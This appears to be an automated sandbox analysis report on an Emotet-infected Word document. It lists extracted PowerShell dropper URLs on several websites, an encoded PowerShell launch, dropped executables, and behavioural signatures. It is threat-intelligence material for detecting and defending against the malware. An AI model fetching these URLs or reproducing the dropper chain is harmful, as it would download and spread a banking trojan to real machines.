Analysis

  • max time kernel: 29s
  • max time network: 23s
  • resource: win7v191014
  • submitted: 05-02-2020 12:52

General

  • Target: a8c2484e46608a21dfeeff1ab85c6bf46bdf1322017201ce053086e9aedc663c.doc
  • Sample: 200205-pbx9p3jwm6
  • SHA256: a8c2484e46608a21dfeeff1ab85c6bf46bdf1322017201ce053086e9aedc663c

Score
10/10

Malware Config

Extracted

Language: ps1

Source / URLs

  • exe.dropper: http://alwaysonq.com/web_map/UkwFMlO/
  • exe.dropper: http://norbert.strzelecki.org/wp-includes/6jGh/
  • exe.dropper: http://bieres.lavachenoiresud.com/wp-includes/0wycYTX/
  • exe.dropper: https://theresurrectionchurch.nl/tmp/eo5st/
  • exe.dropper: https://tahfizbd.com/wp-admin/ulu/

Signatures

  • Blacklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Modifies registry class 280 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a8c2484e46608a21dfeeff1ab85c6bf46bdf1322017201ce053086e9aedc663c.doc"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:1292
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e 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
    1⤵
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:676
  • C:\Users\Admin\330.exe
    C:\Users\Admin\330.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EmotetMutantsSpam
    • Drops file in System32 directory
    PID:1376
    • C:\Windows\SysWOW64\msvcirt\msvcirt.exe
      "C:\Windows\SysWOW64\msvcirt\msvcirt.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1900

Network

MITRE ATT&CK Matrix

Downloads

  • memory/1292-0-0x00000000060D0000-0x00000000060D4000-memory.dmp (Filesize: 16KB)
  • memory/1292-1-0x00000000061B0000-0x00000000061B4000-memory.dmp (Filesize: 16KB)
  • memory/1292-2-0x00000000061B0000-0x00000000061B4000-memory.dmp (Filesize: 16KB)
  • memory/1292-3-0x0000000009220000-0x0000000009224000-memory.dmp (Filesize: 16KB)
  • memory/1292-6-0x000000000B2E0000-0x000000000B2E4000-memory.dmp (Filesize: 16KB)
  • memory/1292-7-0x000000000C360000-0x000000000C364000-memory.dmp (Filesize: 16KB)
  • memory/1292-9-0x000000000C360000-0x000000000C364000-memory.dmp (Filesize: 16KB)
  • memory/1376-11-0x00000000002E0000-0x00000000002F3000-memory.dmp (Filesize: 76KB)
  • memory/1376-12-0x0000000000400000-0x0000000000428000-memory.dmp (Filesize: 160KB)